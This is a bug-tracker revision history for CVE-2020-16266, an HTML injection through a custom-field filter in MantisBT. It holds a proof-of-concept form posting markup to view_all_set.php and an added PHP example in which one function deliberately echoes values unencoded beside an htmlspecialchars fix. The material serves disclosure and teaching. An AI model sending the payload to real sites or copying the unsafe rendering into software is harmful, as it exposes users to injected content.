View Revisions: Issue #27056

Summary 0027056: CVE-2020-16266: HTML injection (maybe XSS) via custom field on view_all_bug_page.php
Revision 2020-06-22 07:17 by dregad
Steps To Reproduce
  1. Create a custom string type field.
  2. Create a form that sends HTML code in the custom field 1 value (see poc).

poc:
<form action="https://[hostname]/view_all_set.php?f=3" method="POST">
<input name="custom_field_1[]" value="<h1 style=color:red>INJECTION</h1>">
<input type=submit>
</form>

Revision 2020-06-21 02:29 by hanno
Steps To Reproduce
  1. Create a custom string type field.
  2. Create a form that sends HTML code in the custom field 1 value (see poc).

poc:
<form action="https://[hostname]/view_all_set.php?f=3" method="POST">
<input name="custom_field_1[]" value="<h1 style=color:red>INJECTION</h1>">
<input type=submit>
</form>
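Added illustration of the bug class behind this report (not MantisBT's own code and not the reporter's): a custom-field filter value submitted as an array, as in the poc above, is echoed into the page verbatim, beside the encoded rendering that neutralises the same payload. The function names and the request shape are assumptions.

```php
<?php
// Constructed request matching the poc form: custom_field_1[] arrives as an array.
$request = [
    'custom_field_1' => ['<h1 style=color:red>INJECTION</h1>', 'normal text'],
];

// Defensive input handling (assumed helper): the filter expects plain strings,
// so drop anything that is not a non-empty string before it reaches a template.
function normalise_filter_values($raw): array {
    if (!is_array($raw)) {
        $raw = [$raw];
    }
    return array_values(array_filter($raw, fn($v) => is_string($v) && $v !== ''));
}

// Vulnerable pattern: values are concatenated into markup as-is, so the browser
// parses the submitted <h1> tag (or a script-bearing tag) as part of the page.
function render_filter_values_unsafe(array $values): string {
    $items = '';
    foreach ($values as $v) {
        $items .= '<li>' . $v . '</li>';
    }
    return '<ul>' . $items . '</ul>';
}

// Hardened pattern: every value is HTML-encoded for the context it lands in.
// ENT_QUOTES also covers attribute contexts (e.g. echoing the filter back into
// an <input value="...">); an explicit charset avoids encoding mismatches.
function render_filter_values_safe(array $values): string {
    $items = '';
    foreach ($values as $v) {
        $items .= '<li>' . htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</li>';
    }
    return '<ul>' . $items . '</ul>';
}

$values = normalise_filter_values($request['custom_field_1']);

echo "Unsafe output:\n", render_filter_values_unsafe($values), "\n\n";
echo "Encoded output:\n", render_filter_values_safe($values), "\n";
```

Run with `php` on the command line and compare the two outputs: only the encoded one keeps the angle brackets as literal text.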